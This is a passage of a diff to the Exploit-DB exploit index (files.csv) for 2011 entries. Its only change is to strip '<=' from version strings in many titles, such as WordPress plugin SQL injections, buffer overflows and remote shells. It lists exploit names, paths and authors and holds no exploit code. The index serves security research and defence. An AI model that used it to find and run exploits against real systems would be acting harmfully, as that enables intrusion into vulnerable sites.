Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 -17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin <= 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 +17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 +17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server DoS (Write command)",2011-08-05,"SecPod Research",windows,dos,0 17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",windows,remote,0 17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 session hijacking",2011-08-07,seth,php,webapps,0 17626,platforms/windows/remote/17626.rb,"PXE Exploit server",2011-08-05,Metasploit,windows,remote,0 -17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin <= 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 -17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin <= 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 +17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 +17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17630,platforms/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 @@ -15327,46 +15327,46 @@ id,file,description,date,author,platform,type,port 17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun PoC",2011-08-09,webDEViL,windows,dos,0 17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload",2011-08-09,pentesters.ir,php,webapps,0 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0 -17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection",2011-08-09,NoGe,php,webapps,0 +17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search SQL Injection",2011-08-09,NoGe,php,webapps,0 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux)",2011-08-10,SZ,linux,remote,0 -17649,platforms/windows/remote/17649.py,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 +17649,platforms/windows/remote/17649.py,"BisonFTP Server 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (1)",2011-08-10,Metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 -17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,Metasploit,windows,remote,0 +17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,Metasploit,windows,remote,0 17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 XRF / CSRF",2011-08-14,"Smith Falcon",php,webapps,0 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0 -17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0 +17660,platforms/php/webapps/17660.txt,"videoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x - (4.6.5) SQL Injection",2011-08-13,"Aung Khant",php,webapps,0 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos,0 -17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 +17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0 -17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin <= 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 +17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component Local File Inclusion",2011-08-17,NoGe,php,webapps,0 17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0 17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin LIST command Remote Heap Overflow PoC",2011-08-17,0in,windows,dos,0 -17677,platforms/php/webapps/17677.txt,"WordPress File Groups plugin <= 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17678,platforms/php/webapps/17678.txt,"WordPress Contus HD FLV Player plugin <= 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium <= 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17680,platforms/php/webapps/17680.txt,"WordPress Easy Contact Form Lite Plugin <= 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17681,platforms/php/webapps/17681.txt,"WordPress OdiHost Newsletter plugin <= 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17682,platforms/php/webapps/17682.php,"Contrexx Shopsystem <= 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 -17683,platforms/php/webapps/17683.txt,"WordPress Plugin DS FAQ <= 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17684,platforms/php/webapps/17684.txt,"WordPress Plugin Forum <= 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17685,platforms/php/webapps/17685.txt,"Elgg <= 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 -17686,platforms/php/webapps/17686.txt,"WordPress Ajax Gallery plugin <= 3.0 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17687,platforms/php/webapps/17687.txt,"WordPress Global Content Blocks plugin <= 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17688,platforms/php/webapps/17688.txt,"WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin <= 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17677,platforms/php/webapps/17677.txt,"WordPress File Groups plugin 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17678,platforms/php/webapps/17678.txt,"WordPress Contus HD FLV Player plugin 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17680,platforms/php/webapps/17680.txt,"WordPress Easy Contact Form Lite Plugin 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17681,platforms/php/webapps/17681.txt,"WordPress OdiHost Newsletter plugin 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17682,platforms/php/webapps/17682.php,"Contrexx Shopsystem 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 +17683,platforms/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17684,platforms/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17685,platforms/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 +17686,platforms/php/webapps/17686.txt,"WordPress Ajax Gallery plugin 3.0 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17687,platforms/php/webapps/17687.txt,"WordPress Global Content Blocks plugin 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17688,platforms/php/webapps/17688.txt,"WordPress Allow PHP in Posts and Pages plugin 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution",2011-08-19,Metasploit,multiple,remote,0 17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow Exploit (Metasploit)",2011-08-19,Qnix,windows,remote,0 -17695,platforms/php/webapps/17695.txt,"phpMyRealty <= 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 +17695,platforms/php/webapps/17695.txt,"phpMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 17694,platforms/php/webapps/17694.txt,"network tracker .95 - Stored XSS",2011-08-19,G13,php,webapps,0 17696,platforms/multiple/dos/17696.pl,"Apache httpd Remote Denial of Service (memory exhaustion)",2011-08-19,kingcope,multiple,dos,0 17697,platforms/windows/remote/17697.rb,"HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",2011-08-20,Metasploit,windows,remote,0 @@ -15375,10 +15375,10 @@ id,file,description,date,author,platform,type,port 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) Stored XSS",2011-08-20,"Eyup CELIK",php,webapps,0 -17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin <= 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 +17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 17705,platforms/php/webapps/17705.txt,"EasySiteEdit Remote File Inclusion",2011-08-21,"koskesh jakesh",php,webapps,0 17706,platforms/php/webapps/17706.pl,"onefilecms 1.1.1 - Multiple Vulnerabilities",2011-08-21,mr.pr0n,php,webapps,0 -17707,platforms/php/webapps/17707.txt,"WordPress MM Duplicate plugin <= 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",php,webapps,0 +17707,platforms/php/webapps/17707.txt,"WordPress MM Duplicate plugin 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",php,webapps,0 17708,platforms/php/webapps/17708.txt,"Web Solutions Wcs2u SQL Injection",2011-08-22,tempe_mendoan,php,webapps,0 17709,platforms/php/webapps/17709.txt,"Bonza Digital Cart Script SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 17710,platforms/php/webapps/17710.txt,"DV Cart Shopping Cart software SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 @@ -15387,62 +15387,62 @@ id,file,description,date,author,platform,type,port 17713,platforms/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 - Multiple Stored XSS Vulnerabilities",2011-08-23,LiquidWorm,jsp,webapps,0 17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g - CSRF (add admin)",2011-08-24,G13,php,webapps,0 17715,platforms/windows/local/17715.html,"F-Secure Multiple Products - ActiveX SEH Overwrite (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 -17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0 +17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - (.m3u) Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0 17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,Metasploit,windows,remote,0 -17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0 +17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0 17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0 17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit)",2011-08-26,"Aung Khant",php,webapps,0 -17724,platforms/php/webapps/17724.txt,"WordPress Js-appointment plugin <= 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17725,platforms/php/webapps/17725.txt,"WordPress MM Forms Community plugin <= 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17724,platforms/php/webapps/17724.txt,"WordPress Js-appointment plugin 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17725,platforms/php/webapps/17725.txt,"WordPress MM Forms Community plugin 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 17727,platforms/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 - Local Buffer Overflow",2011-08-27,X-h4ck,windows,local,0 -17728,platforms/php/webapps/17728.txt,"WordPress Super CAPTCHA plugin <= 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17729,platforms/php/webapps/17729.txt,"WordPress Collision Testimonials plugin <= 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17730,platforms/php/webapps/17730.txt,"WordPress oQey Headers plugin <= 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 -17731,platforms/php/webapps/17731.txt,"WordPress Photoracer Plugin <= 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 +17728,platforms/php/webapps/17728.txt,"WordPress Super CAPTCHA plugin 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17729,platforms/php/webapps/17729.txt,"WordPress Collision Testimonials plugin 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17730,platforms/php/webapps/17730.txt,"WordPress oQey Headers plugin 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 +17731,platforms/php/webapps/17731.txt,"WordPress Photoracer Plugin 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass Exploit",2011-08-27,"C4SS!0 G0M3S",windows,local,0 -17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro <= 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 -17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension <= 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 +17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 +17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 17735,platforms/windows/local/17735.pl,"yahoo! player 1.5 - (.m3u) Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 -17736,platforms/php/webapps/17736.txt,"joomla simple file lister module <= 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0 -17737,platforms/php/webapps/17737.txt,"WordPress Facebook Promotions plugin <= 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17738,platforms/php/webapps/17738.txt,"WordPress Evarisk plugin <= 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin <= 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 -17740,platforms/php/webapps/17740.txt,"WordPress mySTAT plugin <= 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17736,platforms/php/webapps/17736.txt,"joomla simple file lister module 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0 +17737,platforms/php/webapps/17737.txt,"WordPress Facebook Promotions plugin 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17738,platforms/php/webapps/17738.txt,"WordPress Evarisk plugin 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 +17740,platforms/php/webapps/17740.txt,"WordPress mySTAT plugin 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 17741,platforms/php/webapps/17741.txt,"Omnistar Mailer - Multiple Vulnerabilities",2011-08-28,Sid3^effects,php,webapps,0 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 17743,platforms/php/webapps/17743.rb,"LifeSize Room - Command Injection (Metasploit)",2011-08-28,"Spencer McIntyre",php,webapps,0 17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - (.m3u) Universal BoF",2011-08-29,"D3r K0n!G",windows,local,0 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 -17748,platforms/php/webapps/17748.txt,"WordPress SH Slideshow plugin <= 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 -17749,platforms/php/webapps/17749.txt,"WordPress iCopyright(R) Article Tools plugin <= 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 -17750,platforms/php/webapps/17750.txt,"WordPress Advertizer plugin <= 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin <= 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17748,platforms/php/webapps/17748.txt,"WordPress SH Slideshow plugin 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 +17749,platforms/php/webapps/17749.txt,"WordPress iCopyright(R) Article Tools plugin 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 +17750,platforms/php/webapps/17750.txt,"WordPress Advertizer plugin 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0 17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)",2011-08-30,sickness,windows,local,0 -17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin <= 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio gallery playlist <= 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin <= 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17758,platforms/php/webapps/17758.txt,"WordPress PureHTML plugin <= 1.0.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17759,platforms/php/webapps/17759.txt,"WordPress Couponer plugin <= 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 -17760,platforms/php/webapps/17760.txt,"WordPress grapefile plugin <= 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 -17761,platforms/php/webapps/17761.txt,"WordPress Plugin image gallery with slideshow <= 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 +17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio gallery playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17758,platforms/php/webapps/17758.txt,"WordPress PureHTML plugin 1.0.0 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17759,platforms/php/webapps/17759.txt,"WordPress Couponer plugin 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17760,platforms/php/webapps/17760.txt,"WordPress grapefile plugin 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 +17761,platforms/php/webapps/17761.txt,"WordPress Plugin image gallery with slideshow 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow",2011-08-31,Metasploit,windows,remote,0 -17763,platforms/php/webapps/17763.txt,"WordPress Donation plugin <= 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 -17764,platforms/php/webapps/17764.txt,"WordPress Plugin Bannerize <= 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17763,platforms/php/webapps/17763.txt,"WordPress Donation plugin 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17764,platforms/php/webapps/17764.txt,"WordPress Plugin Bannerize 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 -17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin <= 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - (.plf) PlayList Buffer Overflow",2011-09-01,Metasploit,windows,local,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 -17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin <= 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",php,webapps,0 +17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",php,webapps,0 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 -17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps,0 +17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion",2011-09-03,"HaCkErS eV!L",php,webapps,0 17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,Metasploit,windows,local,0 -17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 -17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 +17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 +17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2011-09-05,blake,windows,local,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft Local Stack Overflow DoS Exploit (chat-cache.txt)",2011-09-05,"BSOD Digital",windows,dos,0 17782,platforms/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection",2011-09-05,J.O,php,webapps,0 @@ -15450,31 +15450,31 @@ id,file,description,date,author,platform,type,port 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 17786,platforms/php/webapps/17786.txt,"Webmobo WB News System Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro - SEH Overwrite",2011-09-06,blake,windows,local,0 -17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin <= 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,php,webapps,0 -17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin <= 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 -17791,platforms/php/webapps/17791.txt,"WordPress KNR Author List Widget plugin <= 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 -17792,platforms/php/webapps/17792.txt,"PlaySms <= 0.9.5.2 - Remote File Inclusion",2011-09-06,NoGe,php,webapps,0 -17793,platforms/php/webapps/17793.txt,"WordPress SCORM Cloud plugin <= 1.0.6.6 - SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 -17794,platforms/php/webapps/17794.txt,"WordPress Eventify - Simple Events plugin <= 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 +17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,php,webapps,0 +17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 +17791,platforms/php/webapps/17791.txt,"WordPress KNR Author List Widget plugin 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 